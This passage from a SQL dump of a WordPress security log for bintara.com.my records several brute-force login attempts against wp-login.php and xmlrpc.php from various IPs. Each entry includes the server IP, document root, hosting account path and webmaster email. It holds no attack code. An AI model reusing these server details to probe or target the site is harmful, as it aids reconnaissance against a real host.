16:23:26',17740920,19231688,'https://bintara.com.my/wp-login.php',1,0,'23.83.230.2'),(24184,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"38084\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@3AB0uvyt9KRYoKL8vtAAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568651008.8809\";s:12:\"REQUEST_TIME\";s:10:\"1568651008\";}}','notice','2019-09-16 16:23:30','2019-09-16 16:23:29',18258336,19556464,'https://bintara.com.my/xmlrpc.php',1,0,'23.83.230.2'),(24185,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.168.151\";s:11:\"REMOTE_PORT\";s:5:\"60054\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@46R0uvyt9KRYoKL8w7gAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568651497.3917\";s:12:\"REQUEST_TIME\";s:10:\"1568651497\";}}','notice','2019-09-16 16:31:38','2019-09-16 16:31:37',17740568,19232296,'https://bintara.com.my/wp-login.php',1,0,'46.101.168.151'),(24186,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.168.151\";s:11:\"REMOTE_PORT\";s:5:\"33002\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@47HPgbK7GuRh1kKnouwAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568651500.5393\";s:12:\"REQUEST_TIME\";s:10:\"1568651500\";}}','notice','2019-09-16 16:31:41','2019-09-16 16:31:40',18258968,19555904,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.168.151'),(24187,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"14560\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@5wh0uvyt9KRYoKL8xoAAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568651714.2168\";s:12:\"REQUEST_TIME\";s:10:\"1568651714\";}}','notice','2019-09-16 16:35:15','2019-09-16 16:35:14',17737568,19227744,'https://bintara.com.my/wp-login.php',1,0,'192.241.190.85'),(24188,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"15084\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@5xWf5CPZPc3WLyovN8gAAAM8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568651717.542\";s:12:\"REQUEST_TIME\";s:10:\"1568651717\";}}','notice','2019-09-16 16:35:18','2019-09-16 16:35:17',18258960,19555904,'https://bintara.com.my/xmlrpc.php',1,0,'192.241.190.85'),(24189,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"202.92.6.144\";s:11:\"REMOTE_PORT\";s:5:\"46736\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@8mXPgbK7GuRh1kKnpewAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568652441.6054\";s:12:\"REQUEST_TIME\";s:10:\"1568652441\";}}','notice','2019-09-16 16:47:22','2019-09-16 16:47:21',17742712,19233184,'https://bintara.com.my/wp-login.php',1,0,'202.92.6.144'),(24190,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"202.92.6.144\";s:11:\"REMOTE_PORT\";s:5:\"47880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@8mx0uvyt9KRYoKL8zdQAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568652444.0356\";s:12:\"REQUEST_TIME\";s:10:\"1568652444\";}}','notice','2019-09-16 16:47:25','2019-09-16 16:47:24',18259960,19557792,'https://bintara.com.my/xmlrpc.php',1,0,'202.92.6.144'),(24191,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"26490\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@85x0uvyt9KRYoKL8zkAAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568652519.5532\";s:12:\"REQUEST_TIME\";s:10:\"1568652519\";}}','notice','2019-09-16 16:48:40','2019-09-16 16:48:39',17740392,19232328,'https://bintara.com.my/wp-login.php',1,0,'192.241.190.85'),(24192,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"146.185.183.107\";s:11:\"REMOTE_PORT\";s:5:\"54520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@@XB0uvyt9KRYoKL80TAAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568652892.2133\";s:12:\"REQUEST_TIME\";s:10:\"1568652892\";}}','notice','2019-09-16 16:54:53','2019-09-16 